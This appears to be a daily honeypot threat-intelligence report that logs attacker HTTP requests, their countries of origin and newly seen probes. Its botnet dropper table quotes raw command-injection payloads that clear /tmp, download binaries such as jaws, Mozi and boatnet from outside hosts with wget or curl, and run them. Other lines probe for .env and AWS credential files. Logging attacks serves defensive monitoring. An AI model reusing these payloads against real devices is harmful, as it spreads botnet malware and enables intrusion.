
Report: 2025-07-08

Author
Shoggoth Industries

Daily Report: 2025-07-08

Executive summary

Interaction report on the HTTP services of various honeypots around the world.

executive_summary

In today’s report, we detected 13 stage 1 IP address(es), linked to 6 dropper URL(s).

There are 20 new requests that have never been observed before (these were added to the monitored request database).

A total of 1519 requests were recorded during the day, originating from 13 different countries, with a peak of 817 requests coming from the US.

ot_simplified_report

Simplified report for medium-level interactions with honeypots that mimic industrial systems (website loading or interactions with the website). For more, contact us at social@shoggoth.industries.

| source_country | targeted_country |
|---|---|
| US | Dubai |
| CN | Georgia |

botnet_dropper_behaviour

| remote_addr | request |
|---|---|
| 41.226.204.243 | GET /shell?cd+/tmp;rm+-rf+*;wget+38.57.46.116/jaws;sh+/tmp/jaws HTTP/1.1 |
| 8.216.94.115 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
| 8.222.163.107 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
| 8.219.172.182 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
| 36.255.5.48 | 27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0 |
| 144.172.115.127 | POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20boatnet.arm7%3B%20wget%20http%3A%2F%2F160.187.246.7%2Fhiddenbin%2Fboatnet.arm7%3B%20chmod%20777%20%2A%3B%20.%2Fboatnet.arm7%20tbk HTTP/1.1 |
| 8.215.192.72 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
| 8.222.212.69 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
| 66.63.179.126 | GET /shell?cd+/tmp;rm+-rf+*;wget+38.57.46.116/jaws;sh+/tmp/jaws HTTP/1.1 |
| 8.219.8.33 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
| 8.222.131.91 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
| 144.172.115.127 | POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20boatnet.arm7%3B%20wget%20http%3A%2F%2F160.187.246.86%2Fhiddenbin%2Fboatnet.arm7%3B%20chmod%20777%20%2A%3B%20.%2Fboatnet.arm7%20tbk HTTP/1.1 |
| 45.135.194.11 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%24%28killall%20-9%20mipsel%20mpsl%3B%28wget%20-O-%20http%3A%2F%2F169.255.72.169%2Frondo.sh%7C%7Cbusybox%20wget%20-O-%20http%3A%2F%2F169.255.72.169%2Frondo.sh%7C%7Ccurl%20http%3A%2F%2F169.255.72.169%2Frondo.sh%29%20%7C%20sh%20-s%20tplink%3B%29 HTTP/1.1 |

request

The requests listed here are those that have not yet been integrated into the request database.

|  | number_of_occurence | request |
|---|---|---|
| 358 | 1 | GET /nmaplowercheck1751968022 HTTP/1.1 |
| 359 | 1 | GET /gPNW HTTP/1.1 |
| 374 | 1 | GET /Nmap/folder/check1751968022 HTTP/1.1 |
| 379 | 1 | GET /NmapUpperCheck1751968022 HTTP/1.1 |
| 428 | 1 | \x00\x0E8\xFC\x10\xB5*/NCZ\x00\x00\x00\x00\x00 |
| 581 | 1 | GET /var/www/html/phpinfo.php HTTP/1.1 |
| 586 | 1 | GET /api/.env/api/.env HTTP/1.1 |
| 595 | 1 | GET /var/www/ HTTP/1.1 |
| 598 | 1 | GET /.docker/ HTTP/1.1 |
| 599 | 1 | GET /.github/ HTTP/1.1 |
| 604 | 1 | GET /config/ HTTP/1.1 |
| 607 | 1 | GET /.aws/credentials/login/ HTTP/1.1 |
| 611 | 1 | GET /api/ HTTP/1.1 |
| 627 | 1 | GET /phpversion HTTP/1.1 |
| 630 | 1 | GET /debugger.php HTTP/1.1 |
| 637 | 1 | GET /index.php?info HTTP/1.1 |
| 644 | 1 | GET /diagnostics.php HTTP/1.1 |
| 678 | 1 | GET /data/ HTTP/1.1 |
| 685 | 1 | \x00\x0E8\x086\xBCvlNJ\xBA\x00\x00\x00\x00\x00 |
| 756 | 1 | \x00\x0E8\xD8t\xD2,*\x00\xDB;\x00\x00\x00\x00\x00 |

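country_iso_code

|  | number_of_occurence | country_iso_code |
|---|---|---|
| 0 | 817 | US |
| 1 | 138 | CN |
| 2 | 119 | SE |
| 3 | 101 | NL |
| 4 | 53 | GB |
| 5 | 46 | IR |
| 6 | 38 | SC |
| 7 | 28 | DE |
| 8 | 28 | JP |
| 9 | 19 | PL |
| 10 | 16 | IN |
| 11 | 13 | SG |
| 12 | 11 | BG |
| 13 | 11 | AU |
| 14 | 10 | CA |
| 15 | 9 | RU |
| 16 | 9 | HK |
| 17 | 7 | GH |
| 18 | 5 | ZA |
| 19 | 4 | BE |
| 20 | 4 | BR |
| 21 | 3 | KR |
| 22 | 3 | LT |
| 23 | 3 | KZ |
| 24 | 3 | MU |
| 25 | 2 | IL |
| 26 | 2 | MM |
| 27 | 2 | AT |
| 28 | 2 | TH |
| 29 | 2 | IE |
| 30 | 1 | AR |
| 31 | 1 | VN |
| 32 | 1 | TN |
| 33 | 1 | ID |
| 34 | 1 | ES |
| 35 | 1 | GE |
| 36 | 1 | KH |
| 37 | 1 | JE |
| 38 | 1 | AE |
| 39 | 1 | UA |
| 40 | 1 | EE |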
